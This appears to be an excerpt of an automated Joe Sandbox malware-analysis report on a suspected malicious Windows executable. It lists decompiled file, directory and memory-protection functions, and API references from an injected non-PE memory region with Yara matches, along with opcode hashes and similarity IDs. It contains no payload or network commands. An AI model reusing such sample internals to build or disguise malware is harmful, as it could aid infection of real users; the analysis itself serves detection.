GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
GetProcAddress.KERNEL32(00000000,?), ref: 00406901

Part of subcall function 00406864: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
Part of subcall function 00406864: wsprintfW.USER32 ref: 004068B6
Part of subcall function 00406864: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068CA

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
Instruction ID: b54d22b37b479e59566a9631c032e51b8c6cd741f5ea0e4d018af200ac078f8b
Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
Instruction Fuzzy Hash: 48E086335042109AE21197715D44C7B73A8AF89650307443EF947F2080DB38DC31A669

Uniqueness

Uniqueness Score: -1.00%

Function 00405FF7 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405FF7(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405ffb
0x00406008
0x0040601d
0x00406023

APIs

GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\file.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15

Uniqueness

Uniqueness Score: -1.00%

Function 00405FD2 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405FD2(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}

0x00405fd7
0x00405fdd
0x00405fe2
0x00405feb
0x00405feb
0x00405ff4

APIs

GetFileAttributesW.KERNELBASE(?,?,00405BD7,?,?,00000000,00405DAD,?,?,?,?), ref: 00405FD7
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405FEB

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction ID: 846b50f6ec280e5947384c74444241e6b9796591039fc91e932c01759f2cc32f
Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction Fuzzy Hash: 2CD0C972504531ABC2102728EE0889BBB55EF642717054A35FAA5A22B0CB304C529E98

Uniqueness

Uniqueness Score: -1.00%

Function 00405AB5 Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405AB5(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405abb
0x00405ac3
0x00000000
0x00405ac9
0x00000000

APIs

CreateDirectoryW.KERNELBASE(?,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405ABB
GetLastError.KERNEL32 ref: 00405AC9

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction ID: 81e7360d8487983dd45b28c0c59a41c1d83062ba9acea414cf4290cf05fa9266
Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction Fuzzy Hash: C3C04C30314601AED7505B609E48B177EA19B94741F1A85396146E41A4DA389455DD2D

Uniqueness

Uniqueness Score: -1.00%

Function 033AE6C8 Relevance: 1.7, APIs: 1, Instructions: 168COMMON

Download Yara Rule

APIs

EnumWindows.USER32(033AE84E,00000000,033BF551,-0000000185D5D33F,033BA695,00000000,033AD9FC), ref: 033AE765

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 41807b00d67b65c806d2aed59733cbde2d9e9e231140c290cd626e9c4500b2bb
Instruction ID: c10a7578cd2ee77489f173e20d750e42dd7304592768b732db93bc5ce39f4a53
Opcode Fuzzy Hash: 41807b00d67b65c806d2aed59733cbde2d9e9e231140c290cd626e9c4500b2bb
Instruction Fuzzy Hash: B3514A7281CBE65BC722CBFCE8DA298BF75EF43231F18898CE0845B583D2A14442C746

Uniqueness

Uniqueness Score: -1.00%

Function 033AFFDF Relevance: 1.6, APIs: 1, Instructions: 133serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32(0000002B,?,?,6F270C08,FB5BBFAC,?,-19E57113,?,?,?,-66F9A254), ref: 033B0097

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: ee9b76c1a7b581f23540c44a85071d6f1b5b5eabbae16745e7ba17298c388c34
Instruction ID: 48396d45e4dc0ee0ac6649d10b46141dc5c47170ef0c76f14012df4417acf7c8
Opcode Fuzzy Hash: ee9b76c1a7b581f23540c44a85071d6f1b5b5eabbae16745e7ba17298c388c34
Instruction Fuzzy Hash: 084127624182EA5ACB2FCAF4A89D2CEBF749B02230F18998DD1846F8D7E3D444028345

Uniqueness

Uniqueness Score: -1.00%

Function 033BD824 Relevance: 1.6, APIs: 1, Instructions: 121libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,8E3D722A,?,033BCD41), ref: 033BC1CC

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 7ff0a61f1615fd6f558746f7e98680efe2904dc462855fec51e668f589bf400f
Instruction ID: 1a9e42ffe85e3e60bd7ba26e60329728fc61fc9c6bcb0f0d22cb00ad633429c3
Opcode Fuzzy Hash: 7ff0a61f1615fd6f558746f7e98680efe2904dc462855fec51e668f589bf400f
Instruction Fuzzy Hash: B3414871A0424A8FDF34AE78C9E93EE3ABAAF55350F85012EED8DDBA44C7304645CB01

Uniqueness

Uniqueness Score: -1.00%

Function 033B004E Relevance: 1.6, APIs: 1, Instructions: 113serviceCOMMON

Download Yara Rule

APIs

CloseServiceHandle.ADVAPI32(0000002B,?,?,6F270C08,FB5BBFAC,?,-19E57113,?,?,?,-66F9A254), ref: 033B0097

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 46419a8c94dc8210e0893a3294268ce8c4cd81b4cce0f3d9249624497adaedd6
Instruction ID: 3d2e2160eb4b77eca272edcfec6edb7897d2f71b77ff7825cf899837ecd91459
Opcode Fuzzy Hash: 46419a8c94dc8210e0893a3294268ce8c4cd81b4cce0f3d9249624497adaedd6
Instruction Fuzzy Hash: 8D3128668192EA5ACB2FCAF4A8991CEBF749E43230F1C9D8CC1946F9D7E3D444038315

Uniqueness

Uniqueness Score: -1.00%

Function 033AE60E Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

EnumWindows.USER32(033AE84E,00000000,033BF551,-0000000185D5D33F,033BA695,00000000,033AD9FC), ref: 033AE765

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 67a5b3753b9a5c02501924d50892ed3499ef6d0c1d91241bde48824d0f51d3fb
Instruction ID: 3062e3314211357f45c5d9f599b16c3a1467b83c4e8b0b7f68dbc1e6fe6db818
Opcode Fuzzy Hash: 67a5b3753b9a5c02501924d50892ed3499ef6d0c1d91241bde48824d0f51d3fb
Instruction Fuzzy Hash: C8216A36419A804BC311CF7D84F96D9BB6AFF42219B6C0C9DE1C10F516D7235947C746

Uniqueness

Uniqueness Score: -1.00%

Function 033BC8E8 Relevance: 1.6, APIs: 1, Instructions: 82libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,8E3D722A,?,033BCD41), ref: 033BC1CC

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 059a768c2ecc34b1ad3ec4235a2002412be5f6ea7bf8251ef8a12e992b9fc2d0
Instruction ID: 7c5fdf19821696267a1e003e69de5c13dd69e0ae8cd202c856f155f906aac431
Opcode Fuzzy Hash: 059a768c2ecc34b1ad3ec4235a2002412be5f6ea7bf8251ef8a12e992b9fc2d0
Instruction Fuzzy Hash: 7C214271B4035A8AEF34DE788D653D63B7BEF95750F88811ADD4C9BA44D33089028715

Uniqueness

Uniqueness Score: -1.00%

Function 033AE699 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

EnumWindows.USER32(033AE84E,00000000,033BF551,-0000000185D5D33F,033BA695,00000000,033AD9FC), ref: 033AE765

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: bb7fe73c1185d3e8f8ccdc48f70952bdf9f385fe9f56aec201f90d2800f8b0c9
Instruction ID: f814deb8687125888fc470fda1eb5f78e0d2a0e03d12d388570fe1e4eb8285cf
Opcode Fuzzy Hash: bb7fe73c1185d3e8f8ccdc48f70952bdf9f385fe9f56aec201f90d2800f8b0c9
Instruction Fuzzy Hash: FE1121A682C6F716C727C7F8B4AD68CBF159943230B58DE9CA0942A4D7F6D14002C301

Uniqueness

Uniqueness Score: -1.00%

Function 033BC0C6 Relevance: 1.6, APIs: 1, Instructions: 50libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,8E3D722A,?,033BCD41), ref: 033BC1CC

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f0f478405f1bf2b6d1e76e388301ccccad4635f8105daa98c51881eb0f68cc37
Instruction ID: cb8742c392cbef8aff83aa5979e24032338c28d742166c5441b82f4ad91e9397
Opcode Fuzzy Hash: f0f478405f1bf2b6d1e76e388301ccccad4635f8105daa98c51881eb0f68cc37
Instruction Fuzzy Hash: 6A01D2B4B4025E9EEF34AE688DB97EA3BBADF95350F84411AED4CCB640C73089018B04

Uniqueness

Uniqueness Score: -1.00%

Function 033AE70A Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

EnumWindows.USER32(033AE84E,00000000,033BF551,-0000000185D5D33F,033BA695,00000000,033AD9FC), ref: 033AE765

Memory Dump Source

Source File: 00000001.00000002.4862667877.00000000033A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 033A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_33a0000_file.jbxd

Yara matches

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: d570440fa587e15401c89580d8ea0fad33e35f302ff067a6ee2647988b523aac
Instruction ID: 49d6c53f64a687f0086b5e09d8742ebb1ff1fbb4b58f640a7511864ba2eeb2b0
Opcode Fuzzy Hash: d570440fa587e15401c89580d8ea0fad33e35f302ff067a6ee2647988b523aac
Instruction Fuzzy Hash: 3A014C9292D6FB25C723D7FCB46E28CBF215943231B18EA9DA0993A1CBF6D10002C706

Uniqueness

Uniqueness Score: -1.00%

Function 00401735 Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401735() {
				long _t5;
				WCHAR* _t8;
				WCHAR* _t11;
				void* _t14;
				long _t17;

				_t5 = SearchPathW(_t8, E00402DA6(0xffffffff), _t8, 0x400, _t11, _t14 + 8); // executed
				_t17 = _t5;
				if(_t17 == 0) {
					 *((intOrPtr*)(_t14 - 4)) = 1;
					 *_t11 = _t8;
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t14 - 4));
				return 0;
			}

0x00401749
0x0040174f
0x00401751
0x004028fc
0x00402903
0x00402903
0x00402c2d
0x00402c39

APIs

SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: 08c05bfa2a727fc56896fe43a75c1602cec3d076183c23c6913469dbe3f12912
Instruction ID: 54a96972ebf6e5f7d9af5d5faa48068549acc1a9791dfdba756491a3e909a95f
Opcode Fuzzy Hash: 08c05bfa2a727fc56896fe43a75c1602cec3d076183c23c6913469dbe3f12912
Instruction Fuzzy Hash: 06E0D872204100EBE740DB64DD48EAA3368DF40318B204236E101A50D1E6B48901932D

Uniqueness

Uniqueness Score: -1.00%

Function 0040607A Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040607A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x0040607e
0x0040608e
0x00406096
0x00000000
0x0040609d
0x00000000
0x0040609f

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034AC,00000000,00000000,00403303,000000FF,00000004,00000000,00000000,00000000), ref: 0040608E

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction ID: c8e4d841af9964a9af1d27d101842a5e1860e0780d1899a5c61b78fe641b59a9
Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction Fuzzy Hash: 84E08632140219ABCF10EE518C00EEB379CFF01390F054432F911E2140D638E92187A4

Uniqueness

Uniqueness Score: -1.00%

Function 004060A9 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060A9(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x004060ad
0x004060bd
0x004060c5
0x00000000
0x004060cc
0x00000000
0x004060ce

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347A,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060BD

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859481306.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859636138.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859683026.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859732529.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859786598.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859892187.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860199540.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860265743.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4860375416.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: 36c6d552b97af02dd58307b05a598db1695570393df740455f8c701413f3969e
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: AFE0E632150169ABDF10DE559C00EEB775CEB05351F014476F955E3150DA31E87197A5

Uniqueness

Uniqueness Score: -1.00%

Function 70AC2A7F Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x70ac5048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x70ac505c, 4, 0x40, 0x70ac504c); // executed
					 *0x70ac505c = 0xc2;
					 *0x70ac504c = 0;
					 *0x70ac5054 = 0;
					 *0x70ac5068 = 0;
					 *0x70ac5058 = 0;
					 *0x70ac5050 = 0;
					 *0x70ac5060 = 0;
					 *0x70ac505e = 0;
				}
				return 1;
			}

0x70ac2a88
0x70ac2a8d
0x70ac2a9d
0x70ac2aa5
0x70ac2aac
0x70ac2ab1
0x70ac2ab6
0x70ac2abb
0x70ac2ac0
0x70ac2ac5
0x70ac2aca
0x70ac2aca
0x70ac2ad2

APIs

VirtualProtect.KERNELBASE(70AC505C,00000004,00000040,70AC504C), ref: 70AC2A9D

Memory Dump Source

Source File: 00000001.00000002.4884852064.0000000070AC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 70AC0000, based on PE: true

Associated: 00000001.00000002.4884744827.0000000070AC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.4884980920.0000000070AC4000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.4885091070.0000000070AC6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70ac0000_file.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 91764ec3765645af633195c450c0dee00ba971dac4dbfbf2cef5726039a3d4a9
Instruction ID: f4381bf495ef475da606223bd1d5343d2723894215508083530a010633bef798
Opcode Fuzzy Hash: 91764ec3765645af633195c450c0dee00ba971dac4dbfbf2cef5726039a3d4a9
Instruction Fuzzy Hash: 82F0A5B2544280DECF50CFBA8C4472B3BF0BB58304FA7492AF588D6264E77484C6DB99

Uniqueness

Uniqueness Score: -1.00%

Function 004044AF Relevance: 1.5, APIs: 1, Instructions: 9
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044AF(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x4291f8;
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}

0x004044af
0x004044b6
0x004044c1
0x00000000
0x004044c1
0x004044c7

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1

Memory Dump Source

Source File: 00000001.00000002.4859355724.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.4859311809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.4859428028.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
